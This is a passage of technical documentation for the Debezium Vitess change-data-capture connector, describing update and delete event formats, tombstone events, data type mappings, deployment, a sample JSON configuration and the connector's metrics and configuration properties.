`after` field contains the values of the new row's `id`, `first_name`, `last_name`, and `email` columns.\n\n|8\n|`source`\na|Mandatory field that describes the source metadata for the event. This field contains information that you can use to compare this event with other events, with regard to the origin of the events, the order in which the events occurred, and whether events were part of the same transaction. The source metadata includes:\n\n* {prodname} version\n* Connector type and name\n* Database (a.k.a keyspace) and table that contains the new row\n* If the event was part of a snapshot\n* Offset of the operation in the database binlog\n* Timestamp for when the change was made in the database\n\n|9\n|`op`\na|Mandatory string that describes the type of operation that caused the connector to generate the event. In this example, `c` indicates that the operation created a row. Valid values are:\n\n* `c` = create\n* `u` = update\n* `d` = delete\n\n|10\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\n\/\/ Type: continue\n[[vitess-update-events]]\n=== _update_ events\n\nThe value of a change event for an update in the sample `customers` table has the same schema as a _create_ event for that table. Likewise, the event value's payload has the same structure. However, the event value payload contains different values in an _update_ event. Here is an example of a change event value in an event that the connector generates for an update in the `customers` table:\n\n[source,json,indent=0,options=\"nowrap\",subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"before\": { \/\/ <1>\n \"id\": 1,\n \"first_name\": \"Anne\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"after\": { \/\/ <2>\n \"id\": 1,\n \"first_name\": \"Anne Marie\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"connector\": \"vitess\",\n \"name\": \"my_sharded_connector\",\n \"ts_ms\": 1559033904863,\n \"snapshot\": null,\n \"db\": \"\",\n \"keyspace\": \"commerce\",\n \"table\": \"customers\",\n \"vgtid\": \"[{\\\"keyspace\\\":\\\"commerce\\\",\\\"shard\\\":\\\"80-\\\",\\\"gtid\\\":\\\"MariaDB\/0-54610504-47\\\"},{\\\"keyspace\\\":\\\"commerce\\\",\\\"shard\\\":\\\"-80\\\",\\\"gtid\\\":\\\"MariaDB\/0-1592148-46\\\"}]\"\n },\n \"op\": \"u\", \/\/ <4>\n \"ts_ms\": 1465584025523 \/\/ <5>\n }\n}\n----\n\n.Descriptions of _update_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|An optional field that contains all values of all columns that were in the row before the database commit.\n\n|2\n|`after`\n|An optional field that specifies the state of the row after the event occurred. In this example, the `first_name` value is now `Anne Marie`.\n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. The `source` field structure has the same fields as in a _create_ event, but some values are different. The source metadata includes:\n\n* {prodname} version\n* Connector type and name\n* Database (a.k.a keyspace) and table that contains the new row\n* If the event was part of a snapshot\n* Offset of the operation in the database log\n* Timestamp for when the change was made in the database\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. In an _update_ event value, the `op` field value is `u`, signifying that this row changed because of an update.\n\n|5\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\n[NOTE]\n====\nUpdating the columns for a row's primary key changes the value of the row's key. When a key changes, {prodname} outputs _three_ events: a `DELETE` event and a xref:vitess-tombstone-events[tombstone event] with the old key for the row, followed by an event with the new key for the row. Details are in the next section.\n====\n\n[[vitess-delete-events]]\n=== _delete_ events\n\nThe value in a _delete_ change event has the same `schema` portion as _create_ and _update_ events for the same table. The `payload` portion in a _delete_ event for the sample `customers` table looks like this:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"before\": { \/\/ <1>\n \"id\": 1,\n \"first_name\": \"Anne Marie\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"after\": null, \/\/ <2>\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"connector\": \"vitess\",\n \"name\": \"my_sharded_connector\",\n \"ts_ms\": 1559033904863,\n \"snapshot\": null,\n \"db\": \"\",\n \"keyspace\": \"commerce\",\n \"table\": \"customers\",\n \"vgtid\": \"[{\\\"keyspace\\\":\\\"commerce\\\",\\\"shard\\\":\\\"80-\\\",\\\"gtid\\\":\\\"MariaDB\/0-54610504-47\\\"},{\\\"keyspace\\\":\\\"commerce\\\",\\\"shard\\\":\\\"-80\\\",\\\"gtid\\\":\\\"MariaDB\/0-1592148-47\\\"}]\"\n },\n \"op\": \"d\", \/\/ <4>\n \"ts_ms\": 1465581902461 \/\/ <5>\n }\n}\n----\n\n.Descriptions of _delete_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|Optional field that specifies the state of the row before the event occurred. In a _delete_ event value, the `before` field contains the values that were in the row before it was deleted with the database commit.\n\n|2\n|`after`\n|Optional field that specifies the state of the row after the event occurred. In a _delete_ event value, the `after` field is `null`, signifying that the row no longer exists.\n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. In a _delete_ event value, the `source` field structure is the same as for _create_ and _update_ events for the same table. Many `source` field values are also the same. In a _delete_ event value, the `ts_ms` and `lsn` field values, as well as other values, might have changed. But the `source` field in a _delete_ event value provides the same metadata:\n\n* {prodname} version\n* Connector type and name\n* Database (a.k.a keyspace) and table that contains the new row\n* If the event was part of a snapshot\n* Offset of the operation in the database log\n* Timestamp for when the change was made in the database\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. The `op` field value is `d`, signifying that this row was deleted.\n\n|5\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\nA _delete_ change event record provides a consumer with the information it needs to process the removal of this row.\n\nVitess connector events are designed to work with link:{link-kafka-docs}#compaction[Kafka log compaction]. Log compaction enables removal of some older messages as long as at least the most recent message for every key is kept. This lets Kafka reclaim storage space while ensuring that the topic contains a complete data set and can be used for reloading key-based state.\n\n\/\/ Type: continue\n[[vitess-tombstone-events]]\n.Tombstone events\nWhen a row is deleted, the _delete_ event value still works with log compaction, because Kafka can remove all earlier messages that have that same key. However, for Kafka to remove all messages that have that same key, the message value must be `null`. To make this possible, the Vitess connector follows a _delete_ event with a special _tombstone_ event that has the same key but a `null` value.\n\n\/\/ Type: reference\n\/\/ ModuleID: how-debezium-vitess-connectors-map-data-types\n\/\/ Title: How {prodname} Vitess connectors map data types\n[[vitess-data-types]]\n== Data type mappings\n\nThe Vitess connector represents changes to rows with events that are structured like the table in which the row exists. The event contains a field for each column value. How that value is represented in the event depends on the Vitess data type of the column. This section describes these mappings.\n\n[id=\"vitess-basic-types\"]\n=== Basic types\n\nThe following table describes how the connector maps basic Vitess data types to a _literal type_ and a _semantic type_ in event fields.\n\n* _literal type_ describes how the value is literally represented using Kafka Connect schema types: `INT8`, `INT16`, `INT32`, `INT64`, `FLOAT32`, `FLOAT64`, `BOOLEAN`, `STRING`, `BYTES`, `ARRAY`, `MAP`, and `STRUCT`.\n\n* _semantic type_ describes how the Kafka Connect schema captures the _meaning_ of the field using the name of the Kafka Connect schema for the field.\n\n.Mappings for Vitess basic data types\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|Vitess data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`BOOLEAN, BOOL`\n|`INT16`\na|_n\/a_\n\n|`BIT(1)`\n|Unsupported yet\na|_n\/a_\n\n|`BIT(>1)`\n|Unsupported yet\na|_n\/a_\n\n|`TINYINT`\n|`INT16`\na|_n\/a_\n\n|`SMALLINT[(M)]`\n|`INT16`\na|_n\/a_\n\n|`MEDIUMINT[(M)]`\n|`INT32`\na|_n\/a_\n\n|`INT, INTEGER[(M)]`\n|`INT32`\na|_n\/a_\n\n|`BIGINT[(M)]`\n|`INT64`\na|_n\/a_\n\n|`REAL[(M,D)]`\n|`FLOAT64`\na|_n\/a_\n\n|`FLOAT[(M,D)]`\n|`FLOAT64`\na|_n\/a_\n\n|`DOUBLE[(M,D)]`\n|`FLOAT64`\na|_n\/a_\n\n|`CHAR[(M)]`\n|`STRING`\na|_n\/a_\n\n|`VARCHAR[(M)]`\n|`STRING`\na|_n\/a_\n\n|`BINARY[(M)]`\n|`BYTES`\na|_n\/a_\n\n|`VARBINARY[(M)]`\n|`BYTES`\na|_n\/a_\n\n|`TINYBLOB`\n|`BYTES`\na|_n\/a_\n\n|`TINYTEXT`\n|`STRING`\na|_n\/a_\n\n|`BLOB`\n|`BYTES`\na|_n\/a_\n\n|`TEXT`\n|`STRING`\na|_n\/a_\n\n|`MEDIUMBLOB`\n|`BYTES`\na|_n\/a_\n\n|`MEDIUMTEXT`\n|`STRING`\na|_n\/a_\n\n|`LONGBLOB`\n|`BYTES`\na|_n\/a_\n\n|`LONGTEXT`\n|`STRING`\na|_n\/a_\n\n|`JSON`\n|`STRING`\na|`io.debezium.data.Json` +\nContains the string representation of a `JSON` document, array, or scalar.\n\n|`ENUM`\n|`STRING`\na|`io.debezium.data.Enum` +\nThe `allowed` schema parameter contains the comma-separated list of allowed values.\n\n|`SET`\n|`STRING`\na|`io.debezium.data.EnumSet` +\nThe `allowed` schema parameter contains the comma-separated list of allowed values.\n\n|`YEAR[(2\\|4)]`\n|`STRING`\n|_n\/a_\n\n|`TIMESTAMP[(M)]`\n|`STRING`\na|_n\/a_ +\nIn `yyyy-MM-dd HH:mm:ss.SSS` format with microsecond precision based on UTC. MySQL allows `M` to be in the range of `0-6`.\n\n|`DATETIME[(M)]`\n|`STRING`\na|_n\/a_ +\nIn `yyyy-MM-dd HH:mm:ss.SSS` format with microsecond precision. MySQL allows `M` to be in the range of `0-6`.\n\n|`NUMERIC[(M[,D])]`\n|`STRING`\na|_n\/a_\n\n|`DECIMAL[(M[,D])]`\n|`STRING`\na|_n\/a_\n\n|`GEOMETRY, +\nLINESTRING, +\nPOLYGON, +\nMULTIPOINT, +\nMULTILINESTRING, +\nMULTIPOLYGON, +\nGEOMETRYCOLLECTION`\n|Unsupported yet\na|_n\/a_\n\n|===\n\n\/\/ Type: assembly\n\/\/ ModuleID: setting-up-vitess-to-run-a-debezium-connector\n\/\/ Title: Setting up Vitess to run a {prodname} connector\n[[setting-up-vitess]]\n== Seting up Vitess\n\n{prodname} does not require any specific configuration for use with Vitess. Install Vitess according to the standard instructions in the link:https:\/\/vitess.io\/docs\/get-started\/local-docker\/[Local Install via Docker] guide, or the link:https:\/\/vitess.io\/docs\/get-started\/operator\/[Vitess Operator for Kubernetes] guide.\n\n.Checklist\n\n* Make sure that the VTGate host and its gRPC port (default is 15991) is accessible from the machine where the Vitess connector is installed\n* Make sure that the VTCtld host and its gRPC port (default is 15999) is accessible from the machine where the Vitess connector is installed\n\n\/\/ Type: procedure\n\/\/ ModuleID: grpc-authentication\n\/\/ Title: gRPC authentication for a {prodname} connector\n[[grpc-authentication]]\n=== gRPC authentication\n\nBecause Vitess connector reads change events from the VTGate VStream gRPC server, it does not need to connect directly to MySQL instances. Therefore, no special database user and permissions are needed. At the moment, Vitess connector only supports unauthenticated access to the VTGate gRPC server.\n\n\/\/ Type: assembly\n\/\/ ModuleID: deploying-and-managing-debezium-vitess-connectors\n\/\/ Title: Deploying and managing {prodname} Vitess connectors\n[[vitess-deploying-a-connector]]\n== Deployment\n\nWith link:https:\/\/zookeeper.apache.org[Zookeeper], link:http:\/\/kafka.apache.org\/[Kafka], and {link-kafka-docs}.html#connect[Kafka Connect] installed, the remaining tasks to deploy a {prodname} Vitess connector are to download the link:https:\/\/repo1.maven.org\/maven2\/io\/debezium\/debezium-connector-vitess\/{debezium-version}\/debezium-connector-vitess-{debezium-version}-plugin.tar.gz[connector's plug-in archive], extract the JAR files into your Kafka Connect environment, and add the directory with the JAR files to {link-kafka-docs}\/#connectconfigs[Kafka Connect's `plugin.path`]. You then need to restart your Kafka Connect process to pick up the new JAR files.\n\nIf you are working with immutable containers, see link:https:\/\/hub.docker.com\/r\/debezium\/[{prodname}'s Container images] for Zookeeper, Kafka and Kafka Connect with the Vitess connector already installed and ready to run. You can also xref:operations\/openshift.adoc[run {prodname} on Kubernetes and OpenShift].\n\n\/\/ Type: concept\n\/\/ ModuleID:debezium-vitess-connector-configuration-example\n\/\/ Title: {prodname} Vitess connector configuration example\n[[vitess-example-configuration]]\n=== Connector configuration example\n\nFollowing is an example of the configuration for a Vitess connector that connects to a Vitess (VTGate's VStream) server on port 15991 at 192.168.99.100, whose logical name is `fullfillment`. It also connects to a VTCtld server on port 15999 at 192.168.99.101 to get the initial VGTID. Typically, you configure the {prodname} Vitess connector in a `.json` file using the configuration properties available for the connector.\n\nYou can choose to produce events for a subset of the schemas and tables. Optionally, ignore, mask, or truncate columns that are sensitive, too large, or not needed.\n\n[source,json]\n----\n{\n \"name\": \"inventory-connector\", \/\/ <1>\n \"config\": {\n \"connector.class\": \"io.debezium.connector.vitess.VitessConnector\", \/\/ <2>\n \"database.hostname\": \"192.168.99.100\", \/\/ <3>\n \"database.port\": \"15991\", \/\/ <4>\n \"database.user\": \"vitess\", \/\/ <5>\n \"database.password\": \"vitess_password\", \/\/ <6>\n \"vitess.keyspace\": \"commerce\", \/\/ <7>\n \"vitess.tablet.type\": \"MASTER\", \/\/ <8>\n \"vitess.vtctld.host\": \"192.168.99.101\", \/\/ <9>\n \"vitess.vtctld.port\": \"15999\", \/\/ <10>\n \"vitess.vtctld.user\": \"vitess\", \/\/ <11>\n \"vitess.vtctld.password\": \"vitess_password\", \/\/ <12>\n \"database.server.name\": \"fullfillment\", \/\/ <13>\n \"tasks.max\": 1 \/\/ <14>\n }\n}\n----\n<1> The name of the connector when registered with a Kafka Connect service.\n<2> The name of this Vitess connector class.\n<3> The address of the Vitess (VTGate's VStream) server.\n<4> The port number of the Vitess (VTGate's VStream) server.\n<5> The username of the Vitess database server (VTGate gRPC).\n<6> The password of the Vitess database server (VTGate gRPC).\n<7> The name of the keyspce (a.k.a database). Because no shard is specified, it reads change events from all shards in the keyspace.\n<8> The type of MySQL instance (MASTER OR REPLICA) to read change events from.\n<9> The address of the VTCtld server.\n<10> The port of the VTCtld server.\n<11> The username of the VTCtld server (VTCtld gRPC).\n<12> The password of the VTCtld database server (VTCtld gRPC).\n<13> The logical name of the Vitess cluster, which forms a namespace and is used in all the names of the Kafka topics to which the connector writes, the Kafka Connect schema names, and the namespaces of the corresponding Avro schema when the Avro converter is used.\n<14> Only one task should operate at any one time.\n\nSee the xref:vitess-connector-properties[complete list of Vitess connector properties] that can be specified in these configurations.\n\nYou can send this configuration with a `POST` command to a running Kafka Connect service. The service records the configuration and starts the connector task that connects to the Vitess database and streams change event records to Kafka topics.\n\n\/\/ Type: procedure\n\/\/ ModuleID: adding-debezium-vitess-connector-configuration-to-kafka-connect\n\/\/ Title: Adding {prodname} Vitess connector configuration to Kafka Connect\n[[vitess-adding-connector-configuration]]\n=== Adding connector configuration\n\nTo start running a Vitess connector, create a connector configuration and add the configuration to your Kafka Connect cluster.\n\n.Prerequisites\n\n* The VTGate host and its gRPC port (default is 15991) is accessible from the machine where the Vitess connector is installed\n\n* The VTCtld host and its gRPC port (default is 15999) is accessible from the machine where the Vitess connector is installed\n\n* The Vitess connector is installed.\n\n.Procedure\n\n. Create a configuration for the Vitess connector.\n\n. Use the link:{link-kafka-docs}\/#connect_rest[Kafka Connect REST API] to add that connector configuration to your Kafka Connect cluster.\n\n.Results\n\nWhen the connector starts, it starts generating data change events for row-level operations and streaming change event records to Kafka topics.\n\n\/\/ Type: assembly\n\/\/ ModuleID: monitoring-debezium-vitess-connector-performance\n\/\/ Title: Monitoring {prodname} Vitess connector performance\n[[vitess-monitoring]]\n=== Monitoring\n\nThe {prodname} Vitess connector provides only one type of metrics that are in addition to the built-in support for JMX metrics that Zookeeper, Kafka, and Kafka Connect provide.\n\n* xref:vitess-streaming-metrics[Streaming metrics] provide information about connector operation when the connector is capturing changes and streaming change event records.\n\nxref:{link-debezium-monitoring}#monitoring-debezium[{prodname} monitoring documentation] provides details for how to expose these metrics by using JMX.\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-vitess-connector-record-streaming\n\/\/ Title: Monitoring {prodname} Vitess connector record streaming\n[[vitess-streaming-metrics]]\n==== Streaming metrics\n\nThe *MBean* is `debezium.vitess:type=connector-metrics,context=streaming,server=_<database.server.name>_`.\n\n[cols=\"45%a,25%a,30%a\",options=\"header\"]\n|===\n|Attributes |Type |Description\n\n|[[connectors-strm-metric-millisecondssincelastevent]]<<connectors-strm-metric-millisecondssincelastevent, `+MilliSecondsSinceLastEvent+`>>\n|`long`\n|The number of milliseconds since the connector has read and processed the most recent event.\n\n|[[connectors-strm-metric-totalnumberofeventsseen]]<<connectors-strm-metric-totalnumberofeventsseen, `+TotalNumberOfEventsSeen+`>>\n|`long`\n|The total number of events that this connector has seen since last started or reset.\n\n|[[connectors-strm-metric-numberofeventsfiltered]]<<connectors-strm-metric-numberofeventsfiltered, `+NumberOfEventsFiltered+`>>\n|`long`\n|The number of events that have been filtered by include\/exclude list filtering rules configured on the connector.\n\n|[[connectors-strm-metric-queuetotalcapacity]]<<connectors-strm-metric-queuetotalcapacity, `+QueueTotalCapacity+`>>\n|`int`\n|The length the queue used to pass events between the streamer and the main Kafka Connect loop.\n\n|[[connectors-strm-metric-queueremainingcapacity]]<<connectors-strm-metric-queueremainingcapacity, `+QueueRemainingCapacity+`>>\n|`int`\n|The free capacity of the queue used to pass events between the streamer and the main Kafka Connect loop.\n\n|[[connectors-strm-metric-connected]]<<connectors-strm-metric-connected, `+Connected+`>>\n|`boolean`\n|Flag that denotes whether the connector is currently connected to the database server.\n\n|[[connectors-strm-metric-millisecondsbehindsource]]<<connectors-strm-metric-millisecondsbehindsource, `+MilliSecondsBehindSource+`>>\n|`long`\n|The number of milliseconds between the last change event's timestamp and the connector processing it.\nThe values will incoporate any differences between the clocks on the machines where the database server and the connector are running.\n\n|[[connectors-strm-metric-numberofcommittedtransactions]]<<connectors-strm-metric-numberofcommittedtransactions, `+NumberOfCommittedTransactions+`>>\n|`long`\n|The number of processed transactions that were committed.\n\n|[[connectors-strm-metric-maxqueuesizeinbytes]]<<connectors-strm-metric-maxqueuesizeinbytes, `+MaxQueueSizeInBytes+`>>\n|`long`\n|The maximum buffer of the queue in bytes used to pass events between the streamer and the main Kafka Connect loop.\n\n|[[connectors-strm-metric-currentqueuesizeinbytes]]<<connectors-strm-metric-currentqueuesizeinbytes, `+CurrentQueueSizeInBytes+`>>\n|`long`\n|The current buffer of the queue in bytes used to pass events between the streamer and the main Kafka Connect loop.\n\n\n|===\n\n\/\/ Type: reference\n\/\/ ModuleID: descriptions-of-debezium-vitess-connector-configuration-properties\n\/\/ Title: Description of {prodname} Vitess connector configuration properties\n[[vitess-connector-properties]]\n=== Connector configuration properties\n\nThe {prodname} Vitess connector has many configuration properties that you can use to achieve the right connector behavior for your application. Many properties have default values. Information about the properties is organized as follows:\n\n* xref:vitess-required-configuration-properties[Required configuration properties]\n* xref:vitess-advanced-configuration-properties[Advanced configuration properties]\n* xref:vitess-pass-through-properties[Pass-through configuration properties]\n\n[id=\"vitess-required-configuration-properties\"]\nThe following configuration properties are _required_ unless a default value is available.\n\n.Required connector configuration properties\n[cols=\"30%a,25%a,45%a\",options=\"header\"]\n|===\n|Property\n|Default\n|Description\n\n|[[vitess-property-name]]<<vitess-property-name, `+name+`>>\n|\n|Unique name for the connector. Attempting to register again with the same name will fail. This property is required by all Kafka Connect connectors.\n\n|[[vitess-property-connector-class]]<<vitess-property-connector-class, `+connector.class+`>>\n|\n|The name of the Java class for the connector. Always use a value of `io.debezium.connector.vitess.VitessConnector` for the Vitess connector.\n\n|[[vitess-property-tasks-max]]<<vitess-property-tasks-max, `+tasks.max+`>>\n|`1`\n|The maximum number of tasks that should be created for this connector. The Vitess connector always uses a single task and therefore does not use this value, so the default is always acceptable.\n\n|[[vitess-property-database-hostname]]<<vitess-property-database-hostname, `+database.hostname+`>>\n|\n|IP address or hostname of the Vitess database server (VTGate).\n\n|[[vitess-property-database-port]]<<vitess-property-database-port, `+database.port+`>>\n|`15991`\n|Integer port number of the Vitess database server (VTGate).\n\n|[[vitess-property-keyspace]]<<vitess-property-keyspace, `+vitess.keyspace+`>>\n|\n|The name of the keyspace from which to stream the changes.\n\n|[[vitess-property-shard]]<<vitess-property-shard, `+vitess.shard+`>>\n|_n\/a_\n|An optional name of the shard from which to stream the changes. If not configured, in case of unsharded keyspace, the connector streams changes from the only shard, in case of sharded keyspace, the connector streams changes from all shards in the keyspace. We recommend not configuring it in order to stream from all shards in the keyspace because it has better support for reshard operation. If configured, for example, `-80`, the connector will stream changes from the `-80` shard.\n\n|[[vitess-property-gtid]]<<vitess-property-gtid, `+vitess.gtid+`>>\n|`current`\n|An optional GTID position for a shard to stream from. This has to be set together with `vitess.shard`. If not configured, the connector streams changes from the latest position for the given shard.\n\n|[[vitess-property-stop-on-reshard]]<<vitess-property-stop-on-reshard, `+vitess.stop_on_reshard+`>>\n|`false`\n|Controls Vitess flag stop_on_reshard. +\n +\n`true` - the stream will be stopped after a reshard operation. +\n +\n`false` - the stream will be automatically migrated for the new shards after a reshard operation. +\n +\nIf set to `true`, you should also consider setting `vitess.gtid` in the configuration.\n\n|[[vitess-property-database-user]]<<vitess-property-database-user, `+vitess.database.user+`>>\n|_n\/a_\n|An optional username of the Vitess database server (VTGate). If not configured, unauthenticated VTGate gRPC is used.\n\n|[[vitess-property-database-password]]<<vitess-property-database-password, `+vitess.database.password+`>>\n|_n\/a_\n|An optional password of the Vitess database server (VTGate). If not configured, unauthenticated VTGate gRPC is used.\n\n|[[vitess-property-tablet-type]]<<vitess-property-tablet-type, `+vitess.tablet.type+`>>\n|`MASTER`\n|The type of Tablet (hence MySQL) from which to stream the changes: +\n +\n`MASTER` represents streaming from the master MySQL instance +\n +\n`REPLICA` represents streaming from the replica slave MySQL instance +\n +\n`RDONLY` represents streaming from the read-only slave MySQL instance.\n\n|[[vitess-property-database-server-name]]<<vitess-property-database-server-name, `+database.server.name+`>>\n|\n|Logical name that identifies and provides a namespace for the particular Vitess database server or cluster in which {prodname} is capturing changes.\nOnly alphanumeric characters, hyphens, dots and underscores must be used in the database server logical name.\nThe logical name should be unique across all other connectors, since it is used as a topic name prefix for all Kafka topics that receive records from this connector.\n+\n[WARNING]\n====\nDo not change the value of this property.\nIf you change the name value, after a restart, instead of continuing to emit events to the original topics, the connector emits subsequent events to topics whose names are based on the new value.\n====\n\n|[[vitess-property-table-include-list]]<<vitess-property-table-include-list, `+table.include.list+`>>\n|\n|An optional, comma-separated list of regular expressions that match fully-qualified table identifiers for tables whose changes you want to capture. Any table not included in `table.include.list` does not have its changes captured. Each identifier is of the form _keyspace_._tableName_. By default, the connector captures changes in every non-system table in each schema whose changes are being captured. Do not also set the `table.exclude.list` property.\n\n|[[vitess-property-table-exclude.list]]<<vitess-property-table-exclude.list, `+table.exclude.list+`>>\n|\n|An optional, comma-separated list of regular expressions that match fully-qualified table identifiers for tables whose changes you *do not* want to capture. Any table not included in `table.exclude.list` has it changes captured. Each identifier is of the form _keyspace_._tableName_. Do not also set the `table.include.list` property.\n\n|[[vitess-property-column-include-list]]<<vitess-property-column-include-list, `+column.include.list+`>>\n|\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns that should be included in change event record values. Fully-qualified names for columns are of the form _keyspace_._tableName_._columnName_. Do not also set the `column.exclude.list` property.\n\n|[[vitess-property-column-exclude-list]]<<vitess-property-column-exclude-list, `+column.exclude.list+`>>\n|\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns that should be excluded from change event record values. Fully-qualified names for columns are of the form _keyspace_._tableName_._columnName_. Do not also set the `column.include.list` property.\n\n|[[vitess-property-tombstones-on-delete]]<<vitess-property-tombstones-on-delete, `+tombstones.on.delete+`>>\n|`true`\n|Controls whether a _delete_ event is followed by a tombstone event. +\n +\n`true` - a delete operation is represented by a _delete_ event and a subsequent tombstone event. +\n +\n`false` - only a _delete_ event is emitted. +\n +\nAfter a source record is deleted, emitting a tombstone event (the default behavior) allows Kafka to completely delete all events that pertain to the key of the deleted row in case {link-kafka-docs}\/#compaction[log compaction] is enabled for the topic.\n\n|[[vitess-property-message-key-columns]]<<vitess-property-message-key-columns, `+message.key.columns+`>>\n|_empty string_\n|A semicolon separated list of tables with regular expressions that match table column names. The connector maps values in matching columns to key fields in change event records that it sends to Kafka topics. This is useful when a table does not have a primary key, or when you want to order change event records in a Kafka topic according to a field that is not a primary key. +\n +\nSeparate entries with semicolons. Insert a colon between the fully-qualified table name and its regular expression. The format is: +\n +\n_keyspace-name_._table-name_:_regexp_;... +\n +\nFor example, +\n +\n`keyspaceA.table_a:regex_1;keyspaceA.table_b:regex_2;keyspaceA.table_c:regex_3` +\n +\nIf `table_a` has a an `id` column, and `regex_1` is `^i` (matches any column that starts with `i`), the connector maps the value in ``table_a``'s `id` column to a key field in change events that the connector sends to Kafka.\n|===\n\n[id=\"vitess-advanced-configuration-properties\"]\nThe following _advanced_ configuration properties have defaults that work in most situations and therefore rarely need to be specified in the connector's configuration.\n\n.Advanced connector configuration properties\n[cols=\"30%a,28%a,42%a\",options=\"header\"]\n|===\n|Property\n|Default\n|Description\n\n|[[vitess-property-event-processing-failure-handling-mode]]<<vitess-property-event-processing-failure-handling-mode, `+event.processing.failure.handling.mode+`>>\n|`fail`\n| Specifies how the connector should react to exceptions during processing of events: +\n +\n`fail` propagates the exception, indicates the offset of the problematic event, and causes the connector to stop. +\n +\n`warn` logs the offset of the problematic event, skips that event, and continues processing. +\n +\n`skip` skips the problematic event and continues processing.\n\n|[[vitess-property-max-queue-size]]<<vitess-property-max-queue-size, `+max.queue.size+`>>\n|`20240`\n|Positive integer value that specifies the maximum number of records that the blocking queue can hold.\nWhen {prodname} reads events streamed from the database, it places the events in the blocking queue before it writes them to Kafka.\nThe blocking queue can provide backpressure for reading change events from the database\nin cases where the connector ingests messages faster than it can write them to Kafka, or when Kafka becomes unavailable.\nEvents that are held in the queue are disregarded when the connector periodically records offsets.\nAlways set the value of `max.queue.size` to be larger than the value of xref:{context}-property-max-batch-size[`max.batch.size]`.\n\n|[[vitess-property-max-batch-size]]<<vitess-property-max-batch-size, `+max.batch.size+`>>\n|`10240`\n|Positive integer value that specifies the maximum size of each batch of events that the connector processes.\n\n|[[vitess-property-max-queue-size-in-bytes]]<<vitess-property-max-queue-size-in-bytes, `+max.queue.size.in.bytes+`>>\n|`0`\n|A long integer value that specifies the maximum volume of the blocking queue in bytes.\nBy default, volume limits are not specified for the blocking queue.\nTo specify the number of bytes that the queue can consume, set this property to a positive long value. +\nIf xref:vitess-property-max-queue-size[`max.queue.size`] is also set, writing to the queue is blocked when the size of the queue reaches the limit specified by either property.\nFor example, if you set `max.queue.size=1000`, and `max.queue.size.in.bytes=5000`, writing to the queue is blocked after the queue contains 1000 records, or after the volume of the records in the queue reaches 5000 bytes.\n\n|[[vitess-property-poll-interval-ms]]<<vitess-property-poll-interval-ms, `+poll.interval.ms+`>>\n|`1000`\n|Positive integer value that specifies the number of milliseconds the connector should wait for new change events to appear before it starts processing a batch of events. Defaults to 1000 milliseconds, or 1 second.\n\n|[[vitess-property-sanitize-field-names]]<<vitess-property-sanitize-field-names, `+sanitize.field.names+`>>\n|`true` if connector configuration sets the `key.converter` or `value.converter` property to the Avro converter. +\n`false` if not.\n|Indicates whether field names are sanitized to adhere to xref:{link-avro-serialization}#avro-naming[Avro naming requirements].\n\n|[[vitess-property-skipped-operations]]<<vitess-property-skipped-operations, `+skipped.operations+`>>\n|\n| comma-separated list of operation types that will be skipped during streaming.\nThe operations include: `c` for inserts\/create, `u` for updates, and `d` for deletes.\nBy default, no operations are skipped.\n\n|[[vitess-property-provide-transaction-metadata]]<<vitess-property-provide-transaction-metadata, `provide.transaction.metadata`>>\n|`false`\n|Determines whether the connector generates events with transaction boundaries and enriches change event envelopes with transaction metadata. Specify `true` if you want the connector to do this. See xref:vitess-transaction-metadata[Transaction metadata] for details.\n\n|[[vitess-property-transaction-topic]]<<vitess-property-transaction-topic, `transaction.topic`>>\n|`${database.server.name}.transaction`\n|Controls the name of the topic to which the connector sends transaction metadata messages. The placeholder `${database.server.name}` can be used for referring to the connector's logical name; defaults to `${database.server.name}.transaction`, for example `dbserver1.transaction`.\n\n|[[vitess-property-keepalive-interval-ms]]<<vitess-property-keepalive-interval-ms, `+vitess.keepalive.interval.ms+`>>\n|`Long.MAX_VALUE`\n|Control the interval between periodic gPRC keepalive pings for VStream. Defaults to `Long.MAX_VALUE` (disabled).\n\n|[[vitess-property-grpc-headers]]<<vitess-property-grpc-headers, `+vitess.grpc.headers+`>>\n|\n|Specify a comma-separated list of gRPC headers. Defaults to empty. The format is: +\n +\n_key1:value1,key2:value2_,... +\n +\nFor example, +\n +\n`x-envoy-upstream-rq-timeout-ms:0,x-envoy-max-retries:2`\n\n|[[vitess-property-grpc-max-inbound-message-size]]<<vitess-property-grpc-max-inbound-message-size, `+vitess.grpc.max_inbound_message_size+`>>\n|\n|Specify the maximum message size in bytes allowed to be received on the channel. +\n +\nDefault is 